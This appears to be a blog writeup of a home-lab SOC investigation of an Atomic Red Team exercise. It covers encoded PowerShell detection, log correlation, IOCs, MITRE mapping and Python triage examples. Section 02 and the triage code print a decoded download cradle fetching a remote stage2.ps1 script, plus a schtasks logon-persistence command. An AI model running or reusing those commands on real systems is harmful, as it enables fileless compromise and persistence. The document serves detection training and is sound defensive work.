
Detecting Suspicious PowerShell Activity: A Real SOC Investigation

December 10, 2024 — encoded PowerShell detected on WIN-LAB-01. From first alert to full containment in 42 minutes. Every step documented.

December 10, 2024 · 8 min read · Controlled lab exercise — Atomic Red Team
Time to detection: 2m 15s · Time to containment: 42 min · MITRE techniques: 4
01. Executive Summary

On December 10, 2024, my home Mini-SOC detected encoded PowerShell execution on a lab Windows host attempting to download a remote payload and establish persistence via a scheduled task. This writeup documents the full investigation: from initial Wazuh alert through log correlation, threat intelligence enrichment, host forensics, and containment.

NOTE — Controlled exercise using Atomic Red Team against WIN-LAB-01. Production SOC procedures were followed throughout to validate the detection pipeline.
02. Initial Detection
WAZUH ALERT — RULE 91816
Severity: High — Level 12
Host: WIN-LAB-01 (192.168.1.150)
User: labuser
Timestamp: 2024-12-10 14:23:17 EST
Description: PowerShell encoded command detected

Raw command observed by Wazuh/Sysmon (Event ID 1):

powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQ...

Base64 decoded:

IEX (New-Object Net.WebClient).DownloadString('http://malicious[.]com/stage2.ps1')
schtasks /create /tn "SystemUpdate" /tr "powershell -File C:\Users\Public\update.ps1" /sc onlogon
Why this is critical: Two distinct malicious actions in one execution — (1) fileless payload download via IEX + WebClient, never touching disk, and (2) schtasks persistence that survives reboots. Base64 encoding specifically evades string-based detection rules.
03. Investigation Timeline
T+0:00
Alert Received & Initial Triage
Wazuh Rule 91816 fired on WIN-LAB-01. Alert opened in Splunk. Command decoded manually from Base64 — immediately identified IEX download and schtasks persistence. Severity assessed as High. Investigation started.
T+0:05
Log Correlation — Multi-Source
Splunk query across Wazuh, Suricata, and Windows event indexes. Findings: 3 additional PowerShell executions within 2-minute window. Suricata detected HTTP outbound to 185.220.101.42. Windows Event ID 4698 confirmed scheduled task creation.
index=suricata OR index=wazuh host="WIN-LAB-01"
| eval _time=strptime(timestamp, "%Y-%m-%dT%H:%M:%S")
| sort _time
| table _time, src_ip, dest_ip, dest_port, alert.signature, full_log
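The correlation the Splunk query performs, redone in Python as an added example (not the lab's own pipeline) so the per-source normalisation is explicit: Wazuh-forwarded Sysmon, Suricata EVE and Windows Security records are mapped to one schema, then every event on the alerting host within two minutes of the alert is kept in time order. The JSON records, the Suricata signature text and the field names are constructed to mirror the incident's facts.

```python
import json
from datetime import datetime, timedelta

# Added example, not the writeup's own pipeline. Each source is mapped to one
# schema (time, host, technique, summary); events on the alerting host within
# WINDOW of the pivot (the Wazuh alert time) form the attack chain. The records
# below are CONSTRUCTED; field names are assumptions, not real Wazuh/EVE schemas.

WINDOW = timedelta(minutes=2)

def normalize(source, raw):
    """Map one raw log record into the common schema; None if not of interest."""
    e = json.loads(raw)
    ts = datetime.strptime(e["timestamp"], "%Y-%m-%dT%H:%M:%S")  # same as the SPL strptime
    if source == "sysmon":  # Wazuh-forwarded Sysmon Event ID 1 (process creation)
        return {"time": ts, "host": e["host"], "technique": "T1059.001",
                "summary": "process: " + e["command_line"][:48]}
    if source == "suricata":  # EVE alert record
        return {"time": ts, "host": e["host"], "technique": "T1105",
                "summary": f"net: {e['src_ip']} -> {e['dest_ip']}:{e['dest_port']} {e['alert']['signature']}"}
    if source == "winevt" and e["event_id"] == 4698:  # scheduled task created
        return {"time": ts, "host": e["host"], "technique": "T1053.005",
                "summary": "task created: " + e["task_name"]}
    return None

def correlate(records, host, pivot, window=WINDOW):
    """Time-ordered events for `host` that fall within `window` of `pivot`."""
    events = (normalize(src, raw) for src, raw in records)
    return sorted((ev for ev in events
                   if ev and ev["host"] == host and abs(ev["time"] - pivot) <= window),
                  key=lambda ev: ev["time"])

RECORDS = [  # constructed; timestamps follow the Wazuh alert time in the writeup
    ("sysmon", json.dumps({"timestamp": "2024-12-10T14:23:17", "host": "WIN-LAB-01",
        "command_line": "powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQ..."})),
    ("suricata", json.dumps({"timestamp": "2024-12-10T14:23:19", "host": "WIN-LAB-01",
        "src_ip": "192.168.1.150", "dest_ip": "185.220.101.42", "dest_port": 80,
        "alert": {"signature": "LAB HTTP outbound to flagged host (constructed)"}})),
    ("winevt", json.dumps({"timestamp": "2024-12-10T14:23:20", "host": "WIN-LAB-01",
        "event_id": 4698, "task_name": "SystemUpdate"})),
    ("winevt", json.dumps({"timestamp": "2024-12-10T14:23:21", "host": "WIN-LAB-02",
        "event_id": 4698, "task_name": "Backup"})),  # other host: excluded
    ("sysmon", json.dumps({"timestamp": "2024-12-10T14:40:00", "host": "WIN-LAB-01",
        "command_line": "powershell.exe Get-Date"})),  # outside the window: excluded
]
PIVOT = datetime(2024, 12, 10, 14, 23, 17)  # Wazuh Rule 91816 alert time

for ev in correlate(RECORDS, "WIN-LAB-01", PIVOT):
    print(ev["time"].strftime("%H:%M:%S"), ev["technique"], ev["summary"])
```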
T+0:12
Threat Intelligence Enrichment
Ran C2 IP 185.220.101.42 through CyberOps Sidekick:
  • AbuseIPDB: 100/100 confidence — 47 abuse reports
  • VirusTotal: 8/92 engines flagged malicious
  • AlienVault OTX: associated with commodity malware campaigns
  • Domain age: registered 3 days prior to incident
T+0:25
Host Forensics
Windows Event Log and Sysmon analysis:
  • Event ID 4688: powershell.exe process creation (parent: cmd.exe)
  • Sysmon Event ID 1: full command line captured including encoded payload
  • Event ID 4698: "SystemUpdate" scheduled task created
  • File write: C:\Users\Public\update.ps1
T+0:42
Containment & Remediation
  • Host isolated from network via firewall egress block (DNS exception kept)
  • Malicious powershell.exe (PID 4892) terminated
  • Deleted C:\Users\Public\update.ps1
  • Removed "SystemUpdate" scheduled task
  • Forensic evidence collected: memory dump, logs, registry hive
04. Indicators of Compromise
Type | Value | Context
IP | 185.220.101.42 | C2 server — 100/100 AbuseIPDB, 8/92 VT flags
DOMAIN | malicious[.]com | Stage-2 payload host — 3 days old at time of incident
FILE | C:\Users\Public\update.ps1 | Dropped stage-2 payload script
PROCESS | powershell.exe (PID 4892) | Malicious execution — parent cmd.exe
TASK | SystemUpdate | Persistence — triggers on user logon
HASH | SQBFAFgAIAAo... (B64) | Encoded command payload
05. MITRE ATT&CK Mapping
T1059.001 PowerShell · Tactic: Execution
Attacker used PowerShell to execute an encoded command, leveraging IEX + WebClient for fileless in-memory payload delivery.
T1027 Obfuscated Files · Tactic: Defense Evasion
Base64 encoding used to hide the malicious command content from string-based detection rules and casual log inspection.
T1053.005 Scheduled Task · Tactic: Persistence
"SystemUpdate" scheduled task created to re-execute the malicious PowerShell script on every user logon, surviving reboots.
T1105 Ingress Tool Transfer · Tactic: Command & Control
HTTP GET to 185.220.101.42 attempted to download stage-2 payload (stage2.ps1) from attacker-controlled infrastructure.
06. Lessons Learned
WHAT WORKED
  • Wazuh detected the encoded command within seconds of execution
  • Multi-source log correlation (HIDS + IDS + Windows events) built the full attack chain
  • Automated threat intelligence via CyberOps Sidekick added context in under 30 seconds
  • Forensic evidence collected before containment — proper chain of custody
GAPS IDENTIFIED
  • Base64 decoding was done manually — 5-minute delay that should be automated
  • No pre-built response playbook: isolation steps were recalled from memory
  • Manual network isolation took 15+ minutes — SOAR integration would cut this to seconds
IMPROVEMENTS IMPLEMENTED
  • Splunk alert now auto-decodes Base64 PowerShell commands and appends decoded content to alert
  • Custom Suricata rule written to flag PowerShell -EncodedCommand patterns at network layer
  • Incident response playbook documented for encoded PowerShell class of alerts
  • Threat intel enrichment integrated directly into Splunk alert workflow
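The decode step that section 02 shows done by hand and that the improvements above automate, as an added example (not the lab's Splunk alert code): the -EncodedCommand argument is pulled from a Sysmon Event ID 1 command line, decoded as UTF-16LE Base64, and checked for the download cradle and schtasks persistence seen in this incident. The full Base64 blobs are constructed from the decoded commands in the writeup (the page prints only a truncated prefix), and the indicator names and severity labels are this example's own.

```python
import base64
import re

# Added example, not the writeup's own tooling: automates the Base64 step that was
# done by hand during triage. The -EncodedCommand argument (PowerShell accepts any
# prefix: -e, -ec, -enc, ...) is pulled from a Sysmon Event ID 1 command line,
# decoded as UTF-16LE and checked for the patterns seen in this incident.

FLAG_ARG = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{8,})")
INDICATORS = {  # decoded-content patterns from this incident
    "iex_cradle": re.compile(r"\b(IEX|Invoke-Expression)\b", re.I),
    "remote_download": re.compile(r"DownloadString|Net\.WebClient", re.I),
    "schtasks_persistence": re.compile(r"\bschtasks(\.exe)?\b.*?/create", re.I),
}

def extract_encoded(cmdline):
    """Base64 argument of -EncodedCommand (or any accepted prefix), else None."""
    for flag, blob in FLAG_ARG.findall(cmdline):
        if flag.lower() == "ec" or "encodedcommand".startswith(flag.lower()):
            return blob
    return None

def decode_encoded(blob):
    """PowerShell Base64-encodes the UTF-16LE command; malformed input gives None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(cmdline):
    blob = extract_encoded(cmdline)
    decoded = decode_encoded(blob) if blob else None
    hits = sorted(k for k, rx in INDICATORS.items() if decoded and rx.search(decoded))
    # Encoding alone is worth a look; a download cradle or persistence is High.
    severity = "High" if hits else "Medium" if blob else "Info"
    return {"encoded": blob is not None, "decoded": decoded, "indicators": hits, "severity": severity}

def encode_for_powershell(text):  # mirrors PowerShell's own encoding; used for the samples only
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")

# CONSTRUCTED from the decoded command in the writeup; the post shows only a prefix.
INCIDENT_DECODED = ("IEX (New-Object Net.WebClient).DownloadString('http://malicious[.]com/stage2.ps1'); "
                    'schtasks /create /tn "SystemUpdate" /tr "powershell -File C:\\Users\\Public\\update.ps1" /sc onlogon')
SAMPLES = [  # constructed Sysmon Event ID 1 command lines
    "powershell.exe -EncodedCommand " + encode_for_powershell(INCIDENT_DECODED),
    "powershell.exe -nop -enc " + encode_for_powershell("Get-Date"),  # encoded, benign
    "powershell -File C:\\Users\\Public\\update.ps1",  # not encoded
]

for _line in SAMPLES:
    print(triage(_line)["severity"], triage(_line)["indicators"], (triage(_line)["decoded"] or _line)[:60])
```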
07. Conclusion

Context is everything in SOC work. The initial Wazuh alert was a single line in the logs. By correlating data across three independent sources — HIDS, network IDS, and Windows event logs — and enriching with external threat intelligence, I was able to reconstruct the complete attack chain: initial execution → obfuscation → C2 callback attempt → persistence establishment.

Detection to containment in 42 minutes on a solo analyst workflow. The gaps identified (manual decoding, no playbook, slow isolation) are exactly the kind of friction that SOAR tooling is designed to eliminate. This investigation directly informed automation improvements to the lab pipeline.

08. Skills Demonstrated
Alert Triage, Log Correlation, Base64 Decoding, Threat Intelligence, MITRE ATT&CK, Splunk SPL, Wazuh HIDS, Suricata IDS, Sysmon, Host Forensics, Incident Containment, Documentation